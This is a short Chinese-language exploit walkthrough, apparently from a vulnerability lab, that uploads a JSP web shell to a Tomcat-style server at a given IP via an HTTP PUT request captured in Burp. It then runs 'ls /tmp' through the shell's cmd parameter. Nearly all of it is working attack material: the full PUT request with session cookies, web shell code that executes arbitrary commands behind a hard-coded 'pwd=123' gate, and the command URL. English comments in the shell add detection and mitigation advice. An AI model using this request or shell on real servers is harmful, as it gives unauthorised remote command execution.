访问目标
http://123.58.236.76:15450/
burp抓包
修改请求方式为PUT,增加POST请求体
PUT /shell.jsp/ HTTP/1.1
Host: 123.58.236.76:15450
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6IlUzNGxjL1NvSjdQTzRWMjd1dVNvNHc9PSIsInZhbHVlIjoiNXlRQUpFWTlYek9CTnVkSmk4bzZza05QL3JLNTI4eHJYNHlDaWpsV0lLbjJkYXJpbFJjSXZvUFZYTDQzeTdLZTg1cFc2TmV0OUY0UWVIaXlrZGEwc3dTc3gyaWxtTjJ5eVE1ZVN1TEZ3WFhSbVd1NXVVOE45SUxOQldjM3Z0QTciLCJtYWMiOiI4YzdjMjZmYWM3OGJhNTczZTMxMTUwODY5MGU3YTIzNDRiYjhhYmM5ZDNmNzNjNjFkMjgzMTgzMzVhMDRlMmZjIn0%3D; laravel_session=eyJpdiI6ImFCZS85SDczQXBwL1ZwUFJHUE0veEE9PSIsInZhbHVlIjoic082eUJBSFZrQ2NsOXRxakt6MkVLT0Y5Vk1SbnFDYlJNNkwwSWdpNGhycDN3ejYvaTE4WjBhMThlQnBUTWkwN2RSY3pXZXQwZlNXRTZsVW5OMW0yRmErZGVmeitYYktUbFA1QWhFN1hSMDZGTEJGVURhYlUxczBBbTRKY3hwWUwiLCJtYWMiOiJkYThhN2RmOGRiZjBjZjc1ZTBlNTM4MTQyZmUxOTcyMDllZDM0OTEzZDYxOWY3NzdjNmE1MzcyMTgyYjE0ZmFkIn0%3D; JSESSIONID=3D9771B252C8900C7201D5D0100C59ED
Connection: close
<%
// Web shell payload: this scriptlet is the body of the HTTP PUT shown above. A file of
// this shape anywhere under a servlet container's web root is an indicator of compromise.
// Detection: PUT requests to *.jsp paths in the access log, newly created .jsp files in
// the deployed webapp directory, and subsequent GET requests carrying pwd=/cmd= parameters.
// Mitigation: if the container is Tomcat, keep the DefaultServlet init-param `readonly`
// at its default of `true` so PUT/DELETE are rejected, and limit network exposure of the
// service (the page shows it reachable on a non-standard port with no auth in front).
if("123".equals(request.getParameter("pwd"))){
// Hard-coded gate value: only requests carrying pwd=123 reach the exec below, so the
// "password" is trivially recoverable by anyone who can read the file.
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
// `cmd` is taken verbatim from the request and executed under whatever OS account the
// container runs as — remote command execution gated only by the hard-coded value above.
int a = -1;
byte[] b = new byte[1024];
out.print("<pre>");
while((a=in.read(b))!=-1){
// Each buffer read from the command's stdout is echoed back into the HTTP response,
// so the command output is visible in the page wrapped in <pre>.
out.println(new String(b));
}
out.print("</pre>");
}
%>
直接远程命令执行
http://123.58.236.76:15450/shell.jsp?pwd=123&cmd=ls /tmp